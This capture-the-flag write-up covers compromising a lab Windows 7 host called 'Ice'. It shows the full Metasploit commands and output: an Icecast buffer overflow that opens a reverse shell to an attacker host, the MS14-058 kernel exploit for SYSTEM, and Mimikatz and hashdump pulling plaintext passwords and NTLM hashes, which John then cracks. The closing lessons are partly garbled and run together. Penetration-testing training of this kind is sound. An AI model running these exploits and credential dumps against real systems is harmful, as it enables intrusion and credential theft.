---
Ice is an Easy Windows machine running Icecast, an open-source streaming media server. Versions before 2.0.2 contain a buffer overflow in HTTP header handling (CVE-2004-1561) that gives unauthenticated remote code execution. After landing a low-privilege shell, privilege escalation goes through a kernel exploit in win32k.sys (MS14-058) that bypasses UAC entirely and delivers a SYSTEM shell. From there, Mimikatz (via Kiwi) recovers plaintext credentials directly from memory.
A full port scan first — before running -sC -sV against all 65535 ports. This avoids missing high-numbered services while keeping the version scan fast by running it only against confirmed open ports.
kali㉿kali: ~
┌──(kali㉿kali)-[~]
└─$ nmap -p- -T4 --min-rate 1000 --open --max-retries 2 $TARGET_IP
Starting Nmap 7.99 ( https://nmap.org ) at 2026-09-13 11:19 +0200
Nmap scan report for $TARGET_IP
Host is up (0.019s latency).
Not shown: 61592 closed tcp ports (reset), 3933 filtered tcp ports (no-response)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
5357/tcp open wsdapi
8000/tcp open http-alt
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49160/tcp open unknown
49184/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 13.55 seconds
Port 8000 stands out — that is the default port for Icecast. The high ports above 49000 are standard Windows ephemeral RPC. Version scan against the relevant ports:
kali㉿kali: ~
┌──(kali㉿kali)-[~]
└─$ nmap -sC -sV -p 135,139,445,5357,8000 $TARGET_IP
Starting Nmap 7.99 ( https://nmap.org ) at 2026-09-13 11:21 +0200
Nmap scan report for $TARGET_IP
Host is up (0.019s latency).
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Service Unavailable
|_http-server-header: Microsoft-HTTPAPI/2.0
8000/tcp open http Icecast streaming media server
|_http-title: Site doesn't have a title (text/html).
Service Info: Host: DARK-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 2.1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2026-09-13T09:21:32
|_ start_date: 2026-09-13T09:19:04
|_nbstat: NetBIOS name: DARK-PC, NetBIOS user: <unknown>, NetBIOS MAC: 0a:ff:cc:0f:78:a1 (unknown)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| Computer name: Dark-PC
| NetBIOS computer name: DARK-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2026-09-13T04:21:32-05:00
Nmap done: 1 IP address (1 host up) scanned in 17.74 seconds
The scan confirms Windows 7 Professional SP1 (build 7601) and Icecast on port 8000. The hostname DARK-PC directly reveals the local username: Dark. SMB message signing is disabled — the default on Windows 7 — but SMB is not the attack surface here. Icecast versions before 2.0.2 are vulnerable to CVE-2004-1561: a fixed-size stack buffer overflows when a request contains exactly 32 HTTP headers, overwriting the return address. No authentication required.
Metasploit includes a stable module for this vulnerability. The default payload is x86, which is appropriate because Icecast2.exe is a 32-bit process even on a 64-bit OS.
kali㉿kali: ~
┌──(kali㉿kali)-[~]
└─$ msfconsole -q
msf > use exploit/windows/http/icecast_header
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf exploit(windows/http/icecast_header) > set RHOSTS $TARGET_IP
RHOSTS => $TARGET_IP
msf exploit(windows/http/icecast_header) > set LHOST $ATTACKER_IP
LHOST => $ATTACKER_IP
msf exploit(windows/http/icecast_header) > run
[*] Started reverse TCP handler on $ATTACKER_IP:4444
[*] Sending stage (203455 bytes) to $TARGET_IP
[*] Meterpreter session 1 opened ($ATTACKER_IP:4444 -> $TARGET_IP:49222) at 2026-09-13 11:32:28 +0200
meterpreter > getuid
Server username: Dark-PC\Dark
meterpreter > sysinfo
Computer : DARK-PC
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
Shell landed as Dark-PC\Dark — a regular user. The OS is x64 but Meterpreter is x86 because it injected into the 32-bit Icecast process. Local exploit modules check the session architecture and abort when there is a mismatch. Migrate to a native x64 process first:
meterpreter > ps
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
1300 1020 dwm.exe x64 1 Dark-PC\Dark C:\Windows\System32\dwm.exe
1320 692 explorer.exe x64 1 Dark-PC\Dark C:\Windows\explorer.exe
1488 692 taskhost.exe x64 1 Dark-PC\Dark C:\Windows\System32\taskhost.exe
1996 1320 Icecast2.exe x86 1 Dark-PC\Dark C:\Program Files (x86)\Icecast2 Win32\Icecast2.exe
meterpreter > migrate 1488
[*] Migrating from 1996 to 1488...
[*] Migration completed successfully.
meterpreter > sysinfo
Architecture : x64
Meterpreter : x64/windows
getsystem fails — UAC is active and blocks the standard named pipe and token duplication techniques. The local exploit suggester enumerates viable paths:
meterpreter > run post/multi/recon/local_exploit_suggester
[*] 10.129.146.96 - Collecting local exploits for x64/windows...
[+] exploit/windows/local/bypassuac_comhijack: The target appears to be vulnerable.
[+] exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] exploit/windows/local/cve_2019_1458_wizardopium: The target appears to be vulnerable.
[+] exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
MS14-058 exploits a use-after-free in win32k.sys — a kernel-level vulnerability that runs at ring 0, completely bypassing UAC without needing an elevated process to start from. Set both target and payload to x64 to match the session:
msf > use exploit/windows/local/ms14_058_track_popup_menu
msf exploit(windows/local/ms14_058_track_popup_menu) > set SESSION 1
SESSION => 1
msf exploit(windows/local/ms14_058_track_popup_menu) > set LHOST $ATTACKER_IP
LHOST => $ATTACKER_IP
msf exploit(windows/local/ms14_058_track_popup_menu) > set target 1
target => 1
msf exploit(windows/local/ms14_058_track_popup_menu) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(windows/local/ms14_058_track_popup_menu) > run
[*] Started reverse TCP handler on $ATTACKER_IP:4444
[*] Reflectively injecting the exploit DLL and triggering the exploit...
[*] Launching netsh to host the DLL...
[+] Process 3516 launched.
[*] Reflectively injecting the DLL into 3516...
[*] Sending stage (255679 bytes) to $TARGET_IP
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Meterpreter session 2 opened ($ATTACKER_IP:4444 -> $TARGET_IP:49240) at 2026-09-13 11:45:03 +0200
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > getsystem
[-] Already running as SYSTEM
Full SYSTEM access. Migrate into spoolsv.exe to interact with lsass — the printer spool service runs as SYSTEM, is x64, and restarts automatically if it crashes:
meterpreter > migrate -N spoolsv.exe
[*] Migrating from 3516 to 1396...
[*] Migration completed successfully.
Load Kiwi (Metasploit's Mimikatz integration) to pull credentials directly from memory. This works even without the user actively logged in because Icecast runs as a scheduled task under the Dark account, keeping credentials cached in lsass:
meterpreter > load kiwi
Loading extension kiwi...
.#####. mimikatz 2.2.0 20191125 (x64/windows)
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
Success.
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============
Username Domain NTLM SHA1
-------- ------ ---- ----
Dark Dark-PC 7c4fe5eada682714a036e39378362bab 0d082c4b4f2aeafb67fd0ea568a997e9d3ebc0eb
wdigest credentials
===================
Username Domain Password
-------- ------ --------
Dark Dark-PC Password01!
tspkg credentials
=================
Username Domain Password
-------- ------ --------
Dark Dark-PC Password01!
kerberos credentials
====================
Username Domain Password
-------- ------ --------
Dark Dark-PC Password01!
Dark's plaintext password: Password01!. Confirmed with hashdump:
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Dark:1000:aad3b435b51404eeaad3b435b51404ee:7c4fe5eada682714a036e39378362bab:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Crack Dark's NT hash offline to verify:
kali㉿kali: ~
┌──(kali㉿kali)-[~]
└─$ echo "7c4fe5eada682714a036e39378362bab" > dark_hash.txt
┌──(kali㉿kali)-[~]
└─$ john --format=NT --wordlist=/usr/share/wordlists/rockyou.txt dark_hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (NT [MD4 128/128 SSE2 4x3])
Press 'q' or Ctrl-C to abort, almost any other key for status
Password01! (?)
1g 0:00:00:00 DONE (2026-09-13 11:51) 2.702g/s 5684Kp/s 5684Kc/s
win32k.sys) and bypasses UAC entirely. Unlike UAC-bypass techniques, it does not need to start from an elevated process. Always explicitly set target and payload to match the session architecture when using local exploits.Password01! passes naive complexity checks but appears in every major wordlist. Complexity rules without minimum length and uniqueness requirements produce predictable patterns.creds_all recovers plaintext passwords from lsass memory — even for accounts that are not actively logged in, as long as a service is running under that account.